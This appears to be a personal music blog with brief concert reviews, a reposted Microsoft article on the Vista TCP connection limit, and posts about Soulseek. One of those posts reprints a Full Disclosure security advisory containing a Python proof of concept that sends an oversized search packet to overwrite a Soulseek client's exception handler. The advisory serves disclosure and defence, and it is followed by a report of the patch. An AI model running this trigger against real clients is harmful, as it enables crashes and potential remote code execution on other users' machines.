Diario

  • Ibrahim at home + bassplayer ill, but very intimate.

    Apr 24 2012, 19:44

    Mon 23 Apr – Tinariwen



    Lille Vega, as a playground for musicians, hosting about 300 people, is the perfect setting for intimate experiences.
    Almost shaking hands with the musicians, we had a great evening in the company of Tinariwen, though Ibrahim (front man) was home and the bass player had gotten sick from eating some Italian food (in Italy).

    The rest of the crew did marvelous work, getting the show on the road, keeping the very friendly crowd wanting more, as their guitars gently weeped, so to speak:

    [youtube]http://youtu.be/e2Vpc2VUCOI[/youtube]
    [youtube]http://youtu.be/TfGksO6S9Uw[/youtube]



  • Invited home at Midlakes place

    Feb 6 2010, 8:32

    Fri 5 Feb – Midlake, Sarah Jaffe

    Eight man band playing this night, gave a performance that invited us home in their living room. Tightly knitted, very well played, but a bit of lack of corresponding with the crowd, gave a little distance, though.

    4 of 6 stars
  • Info June 2009: Vista SP2, How to enable the half-open TCP connections limit ...

    Giu 8 2009, 21:24

    For those of you that uses the patch for tcpip.sys...

    MS-link


    Article ID: 969710 - Last Review: May 6, 2009 - Revision: 1.0

    How to enable the half-open TCP connections limit in Windows Vista with Service Pack 2 and in Windows Server 2008 with Service Pack 2


    INTRODUCTION
    By default, the half-open TCP connections limit is disabled in Windows Server 20...
    By default, the half-open TCP connections limit is disabled in Windows Server 2008 with Service Pack 2 (SP2) and in Windows Vista with Service Pack 2 (SP2). This article describes how to impose the half-open TCP connections limit in Windows Server 2008 with SP2 and in Windows Vista with SP2. The limit is ten connections.

    Note In Windows Server 2008 and in Windows Vista with Service Pack 1 (SP1), the system allows for a maximum of ten half-open TCP connections at any time.

    MORE INFORMATION
    How to enable the half-open TCP connections limit Important This section, method...
    How to enable the half-open TCP connections limit

    Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
    322756 (http://support.microsoft.com/kb/322756/ ) How to back up and restore the registry in Windows
    To enable the half-open TCP connections limit in Windows Server 2008 with SP2 or in Windows Vista with SP2, set the value of the EnableConnectionRateLimiting DWORD registry entry to 1 (0x00000001). To do this, follow these steps:

    1. Click Start
    Collapse this imageExpand this image
    Start button
    , type regedit in the Start Search box, and then click regedit.exe in the Programs list.
    Collapse this imageExpand this image
    User Account Control permission
    If you are prompted for an administrator password or for confirmation, type your password, or click Continue.
    2. Locate and then double-click the following registry key:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\EnableConnectionRateLimiting
    3. In the Value data box, type 1, and then click OK.
    4. Exit Registry Editor.
    5. Restart the computer.

    APPLIES TO

    * Windows Vista Service Pack 2
    * Windows Vista Enterprise 64-bit Edition
    * Windows Vista Home Basic 64-bit Edition
    * Windows Vista Home Premium 64-bit Edition
    * Windows Vista Ultimate 64-bit Edition
    * Windows Vista Business 64-bit Edition
    * Windows Vista Business
    * Windows Vista Enterprise
    * Windows Vista Home Basic
    * Windows Vista Home Premium
    * Windows Vista Starter
    * Windows Vista Ultimate
    * Windows Server 2008 Datacenter without Hyper-V
    * Windows Server 2008 Enterprise without Hyper-V
    * Windows Server 2008 for Itanium-Based Systems
    * Windows Server 2008 Standard without Hyper-V
    * Windows Server 2008 Datacenter
    * Windows Server 2008 Enterprise
    * Windows Server 2008 Standard
    * Windows Web Server 2008
    * Windows Small Business Server 2008 Premium
    * Windows Small Business Server 2008 Standard
  • Follow up on the patch

    Giu 5 2009, 8:26

    Soulseek Patched !
    Soulseek maintainer Nir Arbel did release a new Soulseek version (157 Ns 13e) who plug the security hole in previous clients.
    He also did limit the search query length on the server, to avoid any kind of mass random attacks.

    Contacting the Soulseek team was hard, but i need to mention that it wasn't because they was under-considering this security bug, they was just not reachable, because of some circonstances that can happens.

    I want to thanks Nir Arbel for his very professional way to handle this security bug, after a contact can be done.

    The Soulseek server as been patched in a matter of hours after he acknowledged the security advisory, and he did release a patched Soulseek client yesterday, after the bug was triggered locally.

    Another advisory regarding another way to exploit this security hole will be responsibly disclosed when every clients on the Slsk network will be upgraded.

    blog-link
  • slsk, new version, why

    Giu 5 2009, 7:06

    http://seclists.org/fulldisclosure/2009/May/0209.html

    Full Disclosure: Soulseek * P2P Remote Distributed Search Code Execution
    Soulseek * P2P Remote Distributed Search Code Execution

    * This message: [ Message body ] [ More options ]
    * Related messages: [ Next message ] [ Previous message ] [ Next in thread ] [ Replies ]

    From: laurent gaffie <laurent.gaffie_at_gmail.com>
    Date: Mon, 25 May 2009 17:54:40 -0400

    =============================================
    - Release date: May 24th, 2009
    - Discovered by: Laurent Gaffi�
    - Severity: critical
    =============================================

    I. VULNERABILITY
    -------------------------
    Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution

    II. BACKGROUND
    -------------------------
    "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
    sharing application.
    One of the things that makes Soulseek(tm) unique is our community and
    community-related features.
    Based on peer-to-peer technology, virtual rooms allow you to meet people
    with
    the same interests, share information, and chat freely using real-time
    messages
    in public or private.
    Soulseek(tm), with its built-in people matching system, is a great way to
    make
    new friends and expand your mind!"

    III. DESCRIPTION
    -------------------------
    Soulseek client allows distributed file search to one person, everyone, or
    in a
    specific Soulseek IRC channel, allowing a user to find the files he wants,
    in
    a dedicated channel, or with his contacts, or on the whole network.
    Unfortunatly this feature is vulnerable to a remote SEH overwrite to a
    specific
    user, or even to a whole Soulseek IRC channel.

    IV. PROOF OF CONCEPT
    -------------------------
    This proof of concept is made to prevent a S-K party, it is only build to
    target the user "testt4321".

    To try this proof of concept, you would have to open a soulseek client and
    use
    the username:
    "testt4321"
    with the password:
    "12345678"
    And launch this code.
    If you want to change the username or target a whole channel, you would have

    to reverse the binary protocol

    #!/usr/bin/python
    import struct
    import sys, socket
    from time import *

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch

    buffer = "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
    buffer+= "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
    buffer+= "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
    buffer+= "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
    buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"

    s.send(buffer)
    sleep(1)

    junk = "\x41" * 3084
    next_seh = struct.pack('<L', 0x42424242)
    seh = struct.pack('<L', 0x43434343)
    other_junk = "\x61" * 1423

    buffer2 = "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
    buffer2+=
    "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
    s.send(buffer2)
    sleep(1)
    s.recv(1024)

    After the query is send, the memory will look like this
    0012FBE4 41414141
    0012FBE8 42424242 Pointer to next SEH record
    0012FBEC 43434343 SE handler
    0012FBF0 61616161

    And the program will terminate with this structure:
    EAX 00000000
    ECX 43434343
    EDX 7C9132BC ntdll.7C9132BC
    EBX 00000000
    ESP 0012EA78
    EBP 0012EA98
    ESI 00000000
    EDI 00000000
    EIP 43434343

    V. BUSINESS IMPACT
    -------------------------
    An attacker could exploit this vulnerability to compromise any Soulseek
    client connected to
    the Soulseek network.

    VI. SYSTEMS AFFECTED
    -------------------------
    Windows all versions running Soulseek *

    VII. SOLUTION
    -------------------------
    A fast solution would be to use Nicotine-Plus (
    http://nicotine-plus.sourceforge.net/)
    a Python Soulseek client.
    Another quick workaround (at server level) would be to limit the search
    query lenght.

    VIII. REFERENCES
    -------------------------
    http://www.slsknet.org

    IX. CREDITS
    -------------------------
    This vulnerability has been discovered by Laurent Gaffi�
    Laurent.gaffie{remove-this}(at)gmail.com

    X. REVISION HISTORY
    -------------------------
    May 24, 2009: Initial release

    XI. DISCLOSURE TIMELINE
    -------------------------
    july 29, 2008: Bug discovered
    September 03, 2008: Vendor contacted; no response.
    October 14, 2008: Vendor contacted; still no response.
    April 12, 2009: Idefense contacted.
    April 13, 2009: Idefense answered.
    April 23, 2009: Advisory send to idefense contributor program.
    May 13, 2009: Idefense contacted, bug rejected (no reason given)
    May 15, 2009: Idefense recontacted; no answer.
    May 16, 2009: Last try to contact Soulseek maintainers
    May 24, 2009: Advisory published.
  • Soulad

    Gen 25 2009, 16:11

  • Some info on slsk

    Gen 21 2009, 21:25



    and

  • Info on slsk status, nov 2008

    Nov 23 2008, 1:56

  • Foobar /last.fm

    Gen 25 2008, 14:28

    a little message to last.fm users: you may have to update your Foobar Plugin in the software, after the recent last.fm update. There is also a "new" foobar out at:

    http://filehippo.com/download_foobar2000

    changelog is here: http://filehippo.com/download_foobar2000/changelog/

  • Nice link for some bootleg XTC stuff

    Giu 13 2007, 22:11